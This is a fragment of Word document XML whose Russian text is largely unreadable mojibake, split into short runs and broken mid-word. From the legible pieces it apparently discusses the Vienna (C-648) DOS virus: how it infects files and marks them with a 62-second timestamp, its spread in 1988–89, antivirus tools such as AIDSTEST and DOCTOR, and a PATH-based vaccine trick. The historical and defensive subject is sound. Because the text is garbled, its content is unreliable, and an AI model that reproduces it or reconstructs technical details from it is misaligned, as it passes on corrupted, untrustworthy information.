        <w:t xml:space="preserve">।�ਭ����� ������ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㭨�⮦���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>"��⥭</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>樠�쭮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. ���� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>믮������ ����⪠ ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㣨�� ᫮����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ਡ�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12% ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ����� ����ᮬ �ணࠬ� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㭨�⮦��� ���� ���� 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⮦���� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>믮������ ��⥬ ����� � ���� ����  ���⮢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室�   ��   ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ணࠬ��   ��१���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㧪�   </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>BIOS  (���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>室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00:FFF0).  � ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">쭥�襬 �� ����⪥ �믮�����  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>"��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ�����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>"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 �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>믮������  �㤥�  �믮������� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>१���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㧪� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>MS DOS. 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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ணࠬ�� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">室�� � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>AUTOEXEC.BAT,  � �� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㧪� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ந������ ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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 �  ������� ��� ������ ��⥬��� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪥�� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㧨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४�஢�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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ࠦ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஥ �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>믮������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ⮫</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>쪮 �᫨ ��� ��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��� ��⮢ �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">६��� ᮧ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠢ�� ������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ����� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>९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뢠�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">᢮� ��� � ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩�� � ������ � ���� �� ����  �������  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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>।��  ���  �ࠢ�����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  ��᫥ �⮣� �-648 ����⠭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६� � ��ਡ��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㦥 ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ������ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, � �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠢ����� ��।����� �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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮭ��⥫�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">.  �� ����⠭������� ���� ������⢮ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᥪ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㭤 ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠭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ࠢ�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>62 (�.�.  ��᫥���� ���� ��� ��⠭���������� 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. �� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᯮ������ ��� ࠧ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>祭�� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩��� �� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ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᪫���� ����୮� ��ࠦ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>祬</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, �� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>娢�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஢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ࠦ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩��� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ଠ�� � ᥪ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㭤�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ᮧ����� ����� ������� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(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ᥪ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㭤 �� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">६��� ᮧ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩�� �� �뤠����  ��  �����  ��������  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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), �� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ਢ���� � ����୮�� ��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 �����  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>C-648  ��  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஢����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>室���� �� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ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㭨�⮦���� 䠩� �� ���饭��� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪥�� ��� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  � � �⮬ ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>砥 �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 xml:space="preserve">筮� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮮ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>饭�� ����樮���� ��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protect error writing device &lt;���.���.���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ன�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢠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, Retry, Ignore, F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⢥� �� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஥ ������� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">짮��⥫� ��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᭨���� �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१� ��᪥��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">,  ⥬ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᠬ� ࠧ��� ������ ��ࠧ��� ��।��� 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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  ��� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䥪� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>।�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠢��� ����� ��� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>來�� ���������� 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५������ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠪�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>祫���� ���� ������訬 ������ � �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ᯥ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>祭�� ������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪨� �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��� � ��� � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1987 �. � ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>稫 �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ப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�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ய� � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">1988 �.  �� �⮬, � ��⭮��, </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᢨ��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䠪�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  �� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>।� �।�� ����� �  �⨬  ����ᮬ  �������  ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪨� � ����਩᪨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-648  �����  �  ����  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ਡ����⥫</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">쭮 � ������ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1988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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㦥� � ������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ਨ ������� �ணࠬ����  ��⥬  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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᫠���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>-�����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪨�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>).  ��������, �� ����� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㤠 �� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>६� �஢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⮬ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮢ���⭮ � ������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>) ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㭠</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>த���� ���᪮�� �������୮�� ��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᪮��� ��� ����� � �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">।��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">1988 ���� �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㦥 �����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࠭�� � �������� ��ய�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ������ ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>࠭�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, �� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮬ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  ��������⭮</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">,  c  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠧ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">筮��  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>த� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>묨 ����</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t>ﬨ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> �ண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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>祭�� � ��������묨 ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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 ����� ����� � ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1988 ����,  � �������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>襥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࠭���� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>稫 �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ਬ�୮ � ��५� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">1989 ����, ��᫥ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>祣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諠 �� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  �� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>०�� �ᥣ� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>易�� �  �����筮�  �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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।�� ����� �� �⮣� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. ����� �� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>७��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>稪�� �⮣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 ��� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">஢���� ��ਠ�� �ணࠬ�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>SideKick (���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ઠ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ᮦ������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, �� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>࠭� �����࠭���� �⪮�����஢����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 ������� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, �����, � ��⭮��, �� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>祭 �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>祢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砫쭮 �������� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>"�������" ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪥��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. �� ������ ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>쬠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�⠬���"  ������� ����� � ��᪮�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">쪮 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">⠪�� �⠬��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㦥 ��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. ���� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᠭ�� ����ᮢ �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>-534 � �-6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묨 ��⨢����묨 �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ணࠬ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>訬� � ���� � �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ਥ��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묨 �� ����� � �⨬ ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮬ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>뫨 ���㡥��� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ணࠬ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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訥�� � ���� ��娩���� ����� �� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪥�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>।� ��� �������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>襩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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>砫쭮� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠯� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">짮������ ��⥪�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">DIAG � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠣 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>CURE �.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���), DR_NO, FAG_OM � ��. ����⢥��� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>।�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢠ ������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 � �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>६���� �᭮��� �।�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢮� ����� �⠫� ⠪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⢥��� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠣� ��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>AIDSTEST, DOCTOR, VDEATH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ଠ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 �� ����� ����⪠  ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ଠ����  ��������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  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Vienna (����),  DOS-62, Time Bomb (�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮢ�� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>), Flea (����)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१���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㧪�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  VHP-648', RESTART (������ - �.��⨪), P-virus, O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⥪�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>SCAN ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>뢠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enna (DOS 62) Virus - Version A [Vienna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ணࠬ��� �।�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢠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 ������� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஬��� ������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢮ �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ணࠬ� ⨯� ��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஢ � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠣��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. �� �⮬ ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>設�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">⢮ �� ��� �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㪠�뢠��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ��� ������ 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  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>।�����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>祭�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  ���⮬� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">祭� ��� � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>"���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>॥ ��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",  ��⠢�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>塞�� �� ������ ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᯮ������ ��᪮�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>쪮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 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᢮�� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㭪樮����� ����������� ��⥪�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">஢ ��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠣�� ���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⮦���� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ᮬ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, �.�. </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, � ������ ���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⮢ ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᠭ� ������� ����᫮����� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>室� �� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>१���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㧪�  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>M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 F0 FF 00 F0), ����� ����⠭�����, ⮫</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>쪮 �᫨ ���� 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뫨 �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>।���⥫</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>쭮 ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᠭ�  �  �ࠢ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>筮�  䠩��  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ணࠬ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ॢ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⨯� CRC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饥 �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>६� �� ������⥪���  �  ��  ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠣�  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠡ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��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ���� ����� ����ᮬ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">. ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>४������� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>祭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㤮���� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ணࠬ�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>AIDSTEST �.�.�����᪮�� (��� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᯫ��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 ��  ������� ����� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>砥��� 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Advanced Disk Manager,  ����� �������� ��⠭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 ��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠧ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樭� ��  ������� ����� ����� ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮧ���� ���� ᯮᮡ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.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᪮��� �� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">᪥ ᫮�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">PATH ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠪��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪨  ��� ���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TH=",  ���  ����� "������ �� ����� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>த஬</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>" ��⠢�� �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XPATH=�:\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�����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>饩</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>" ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ப� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>SET PATH=. � �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ਢ������� �ਬ�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>DUMMY -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騩 ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠫��, � ��</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t>ࢠ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(��� ��᪮�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>쪮 �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>) �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㪢 � ����� ����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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ந�����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>묨</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  � �⮬ ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">砥 ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>"�������" ��</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t>ࢮ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㪢� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>"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室���� � ᫮�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>XPATH � �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㤥� ������� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">᪠��  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩��  �  ���������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 � � ���������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>饬 ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠫��� DUM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����� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠢��� � �� COMSPEC,  � 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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㦭�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ����� ��������,  �� ������ ���� "������"  �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ࠧ���� � ��᪮�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>쪨� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠢ������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㣨�� ᫮����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, 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饭� �� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ண� </w:t>
